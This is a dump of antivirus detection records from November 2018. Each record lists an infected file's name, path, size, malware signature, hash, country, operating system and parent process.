  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:39:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corel draw 12.exe', filepath='F:\\New folder\\Corel Draw 12\\Corel Draw 12.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T18:00:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unt2cbb.tmp.exe', filepath='\\\\?\\D:\\Windows.old.001\\Users\\daoud\\AppData\\Local\\Temp\\U2CBA.tmp\\UNT2CBB.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='7ed0935158b34445c074a91bff23bf0ba18d60de5fd57d688b9872e52372cbfa', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205629-cbd4ee6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77273961\\AVSCAN-20181101-205534-C42517FF\\AVSCAN-20181101-205629-CBD4EE6F', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:56:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX38.864\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX38.864\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:36:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:37:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201515-55228bd1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5c3369a\\AVSCAN-20181101-201442-530E6216\\AVSCAN-20181101-201515-55228BD1', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:15:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered cemec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered cemec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='0268017b9975cb13801f4f2b1abf5421e24188536126b282a96411a6f92f02ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:06:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gpgsplit.exe', filepath='C:\\NIFPGA\\programs\\Vivado2013_4\\tps\\win32\\git-1.8.3\\bin\\gpgsplit.exe', filesize=256000, name='W32/Sality.AT.#M1.#R1'), hash='284cc3e7c6877e694e4ee78d4c588d5a36daaacd6c15d583def03eb0f277da1f', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Z9GLXPWNEkKiBRLf.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:49:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171328-e29bdcc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7cb21549\\AVSCAN-20181101-165012-79405224\\AVSCAN-20181101-171328-E29BDCC1', filesize=2124000, name='TR/Graftor.141601.A.#M1.#R1'), hash='840f7ce3de5f5e6cacaaaf2fc16993c1e18bbb5920bed7146c6f3c6ec490664c', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:13:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:13:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175739-d47441e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57cbddd8\\AVSCAN-20181101-174945-9A9B0304\\AVSCAN-20181101-175739-D47441E8', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:57:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ym_030619.exe', filepath='E:\\BLACK HOLE\\SOURCE\\ISOS\\YMfiles\\Software\\install\\YM\\中文\\ym_030619.exe', filesize=512000, name='HEUR/AGEN.1008203.#M1.#R1'), hash='1f3f43c4cab219ebe87eb102bbbafb3ac44eeeef3abb2f867f01876fc3f6e37d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4533320, timestamp='2018-11-01T17:38:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003109-70d4dedd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003109-70D4DEDD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='index-jquery.html', filepath='D:\\RIBS\\tax\\new\\inventory\\src\\angular\\docs\\examples\\example-example19\\index-jquery.html', filesize=8000, name='W32/Chir.B.#M1.#R1'), hash='6935b5a246275e7620c54e08c3beefbe7f471ea21c814a21e2d2917d69000def', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:26:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\Desktop\\1.7.10\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T15:46:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corel content.pif', filepath='F:\\New folder\\Corel Content\\Corel Content.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='print.scr', filepath='F:\\New folder\\print\\print.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yrpgnxlo.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\YRPgnXlo.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150353-b91dd5e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150353-B91DD5E2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:04:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fojtnnff.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\fOjtNNFF.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dhl shipment alert.msg', filepath='\\\\?\\D:\\Mladen\\Sacuvani email\\Emails2016pocetak2017\\DHL Shipment Alert.msg', filesize=832000, name='HEUR/AGEN.1015114.#M1.#R1'), hash='d838e8138e61de29055067db74d9a490856c82e9adaf129db33fbc1525f75b0b', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='G:\\phone firmwares\\Lyf_LS5017\\Lyf_LS5017_R012_MT6735_6.0\\Lyf_LS5017_R012_MT6735_6.0\\Lyf_LS5017_R012_MT6735_6.0\\SN Write Tool v2.1504.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='9b1d65b060e0cbbdce7a83ad7d7bf771e9ed744ca12dde08869f65652c1d5540', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T12:50:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b6628e0c4a63017570a1c553210a2c791876a6bfa94048ee747d174b092f1c79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-19.categorizing\\B6628E0C4A63017570A1C553210A2C791876A6BFA94048EE747D174B092F1C79', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b6628e0c4a63017570a1c553210a2c791876a6bfa94048ee747d174b092f1c79', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:21:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093606-9eac7c8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093606-9EAC7C8C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095029-43f4ee32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095029-43F4EE32', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='engim2014-2015.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sould.exe', filepath='C:\\Program Files (x86)\\Keech\\sould.exe', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='af91fa267af2b12ba4d25ad449557bc3adac52acc341d96a31f17d9eb5093186', metadata=Row(cmdline='pjay', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Keech\\sould.exe', parentsize=384000, timestamp='2018-11-01T11:46:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9D41CC0D5F8B97B9ABDFD6CA61B10F159868BFAB17F7E1D94FB1A10ACD69E052', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9d41cc0d5f8b97b9abdfd6ca61b10f159868bfab17f7e1d94fb1a10acd69e052', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:26:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095127-4f3a4a88', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095127-4F3A4A88', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1f3p5msfxyw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files\\Windows Msn\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:33:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dhl shipment alert.msg', filepath='\\\\?\\D:\\Mladen\\Sacuvani email\\Emails2016pocetak2017\\DHL Shipment Alert.msg', filesize=832000, name='HEUR/AGEN.1015114.#M1.#R1'), hash='d838e8138e61de29055067db74d9a490856c82e9adaf129db33fbc1525f75b0b', metadata=Row(cmdline=None, country='ME', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:16:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='operatore servizi di pulizia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\OPERATORE SERVIZI DI PULIZIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsm97A1.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T16:47:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rlistupdater', filepath='/Users/schneider/Library/Application Support/amc/helperamc.app/Contents/Resources/rlistupdater.app/Contents/MacOS/rlistupdater', filesize=204000, name='OSX/GT32SupportGeeks.owcbg.#M0.#R0'), hash='877421f09497bb504dde87c3107888c89f174b955dacb088873bf9754babe5f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T05:44:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gvgsetup_dbg.exe', filepath='F:\\FGOLD\\Huawei_Hisilicon_DRIVER\\Huawei_Hisilicon_DRIVER\\2_for some cases\\WMC_comneon2_3.46.0\\_disk\\gvgsetup_dbg.exe', filesize=932000, name='W32/Sality.AG.#M1.#R1'), hash='8c05618fe9b7a39723ac2dd52b936902891561575927f0b95a871bfce268bde1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T16:08:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ea576e6f7eaff287a3276b21ec50f510a52e5cc45e9c066ddd0f870f6b5bcd68', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\EA576E6F7EAFF287A3276B21EC50F510A52E5CC45E9C066DDD0F870F6B5BCD68', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='ea576e6f7eaff287a3276b21ec50f510a52e5cc45e9c066ddd0f870f6b5bcd68', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:47:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='bc24a522134e73615689ec699c2f3069f94bc611a5c39eff66d2511f09177587', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\f3a1auwacbd\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:59:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-141018-56f762ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_33cb6465\\AVSCAN-20181104-140916-4D9CED5F\\AVSCAN-20181104-141018-56F762AB', filesize=16248000, name='TR/Downloader.62e9ff.#M1.#R1'), hash='62e9ffc879f6369bff969fd40843d1dbce69dd8c593afb694fa4c544bafef058', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:10:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lpk.dll', filepath='I:\\lpk.dll', filesize=256000, name='TR/Nitol.blanu.#M1.#R1'), hash='5b91da70501c83f9f865f091ee61c1ab05bf726eb00199adc161e88303a8d843', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T19:35:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124146-619c4be9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9665639e\\AVSCAN-20181104-124008-5872501E\\AVSCAN-20181104-124146-619C4BE9', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:41:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:26:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:M2lv44Lh9kuhRVWb.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:39:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp10695436\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-04T22:41:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000863a', filepath='C:\\WINDOWS\\Temp\\6e973423-1b42-4edd-98c8-75d8f426b13b\\tmp00000163\\tmp0000863a', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='0bc12b1d623198b6eb8be2523cafc44cdcf55c8fca2bffdb1541566bae94b7fb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T17:14:19Z'), dt=datetime.date(2018, 11, 4)),
